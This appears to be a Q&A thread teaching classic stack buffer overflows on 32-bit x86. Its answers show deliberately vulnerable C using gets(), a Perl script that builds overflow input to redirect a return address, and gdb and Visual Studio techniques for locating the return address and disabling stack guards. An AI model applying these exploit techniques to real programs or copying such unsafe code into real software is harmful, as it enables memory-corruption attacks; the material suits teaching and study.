Trying to smash the stack

Question 1

Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to find the return address on the stack and how to overwrite it with a new one:

Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:

C code:

void function() 
{
    char buffer[4];
}

int main() 
{
    function();
}

Assembly (abridged):

function:
    pushl %ebp
    movl %esp, %ebp
    subl $16, %esp
    leave
    ret
main:
    leal 4(%esp), %ecx
    andl $-16, %esp
    pushl -4(%ecx)
    pushl %ebp
    movl %esp, %ebp
    pushl %ecx
    call function
    ...

There are several tools that you can use to inspect the assembly code. The first, of course, is compiling straight to assembly output with gcc -S main.c. This can be difficult to read since there are few or no hints about which assembly corresponds to which line of the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.

The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.

In the example below, I overwrite the return address to skip the instruction x = 1.

The function function locates the return address and adds 7 to it. The return address originally points to the x = 1 assignment, which is 7 bytes long, so adding 7 makes function return to the instruction immediately after the assignment.

simple C program:

#include <stdio.h>

void function() 
{
    char buffer[4];
    /* return address is 8 bytes beyond the start of the buffer */
    int *ret = (int *)(buffer + 8);
    /* assignment instruction we want to skip is 7 bytes long */
    (*ret) += 7;
}

int main() 
{
    int x = 0;
    function();
    x = 1;
    printf("%d\n",x);
}

Main function (x = 1 at 80483af is seven bytes long):

8048392: 8d4c2404       lea 0x4(%esp),%ecx
8048396: 83e4f0         and $0xfffffff0,%esp
8048399: ff71fc         pushl -0x4(%ecx)
804839c: 55             push %ebp
804839d: 89e5           mov %esp,%ebp
804839f: 51             push %ecx
80483a0: 83ec24         sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff     call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8         mov -0x8(%ebp),%eax
80483b9: 89442404       mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff     call 80482d8 <printf@plt>
80483c9: 83c424         add $0x24,%esp
80483cc: 59             pop %ecx
80483cd: 5d             pop %ebp

We now know where the return address is, and we have demonstrated that changing it affects which code is run. A buffer overflow can do the same thing: when a buffer is filled using gets, supplying the right character string overwrites the return address with a new address.

In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.

#include <stdio.h>
#include <stdlib.h>

void uncalled() 
{
    puts("uh oh!");
    exit(1);
}

void function() 
{
    char buffer[4];
    gets(buffer);
}

int main() 
{
    function();
    puts("program secure");
}

To run uncalled, inspect the executable using objdump or a similar tool to find the address of the entry point of uncalled. Then place that address in the input at the right offset so that it overwrites the old return address. If your computer is little-endian (x86, etc.), the bytes of the address must appear in the input in reverse order, least significant byte first.

To do this correctly, I use the simple Perl script below, which generates input that overflows the buffer and overwrites the return address. It takes two arguments: first the new return address, given as hex digits without a 0x prefix, and second the distance in bytes from the beginning of the buffer to the return address location.

#!/usr/bin/perl
print "x"x$ARGV[1];                                            # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . $ARGV[0] , -8); # swap endian of input
print "\n";                                                    # new line to end gets

Question 2

You need to examine the stack to determine whether buffer1+12 is actually the right address to be modifying. This sort of thing isn't very portable: the offset depends on the compiler, its options, and the architecture.

I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:

char buffer1[5] = "1111";
char buffer2[10] = "2222";

Question 3

You can figure this out by printing out the stack. Add code like this:

int* pESP;
__asm mov pESP, esp

The __asm directive is Visual Studio specific. Once you have the address of the stack you can print out what is there. Note that the stack changes whenever your code makes calls (including the calls that do the printing), so save the whole block of memory at once: first copy the memory at the stack address to an array, then print the array.

What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS puts guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set compiler switches to turn all this off.

Question 4

As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I removed the buffer2 variable and changed buffer1 to 8 bytes so things are better aligned. We will also compile in 32-bit mode to make the addresses easier to read, and turn debugging on (gcc -m32 -g).

void function(int a, int b, int c) {
   char buffer1[8];
   char *ret;

so let's print the address of buffer1:

(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40

then let's print a bit past that and see what's on the stack.

(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000  0x00000000  0xfecf25c3  0x00000003
0xbffffa50: 0x00000000  0xbffffb50  0xbffffa88  0x00001f3b
0xbffffa60: 0x00000001  0x00000002  0x00000003  0x00000000
0xbffffa70: 0x00000003  0x00000002  0x00000001  0x00001efc

Do a backtrace to see where the return address should be pointing:

(gdb) bt
#0  function (a=1, b=2, c=3) at foo.c:18
#1  0x00001f3b in main () at foo.c:26

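and sure enough, there it is: 0x00001f3b is the last word on the 0xbffffa50 row of the dump, which puts it at 0xbffffa5c. Note that the command below reads from 0xbffffa5b, one byte lower, so the value appears shifted by one byte: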

(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf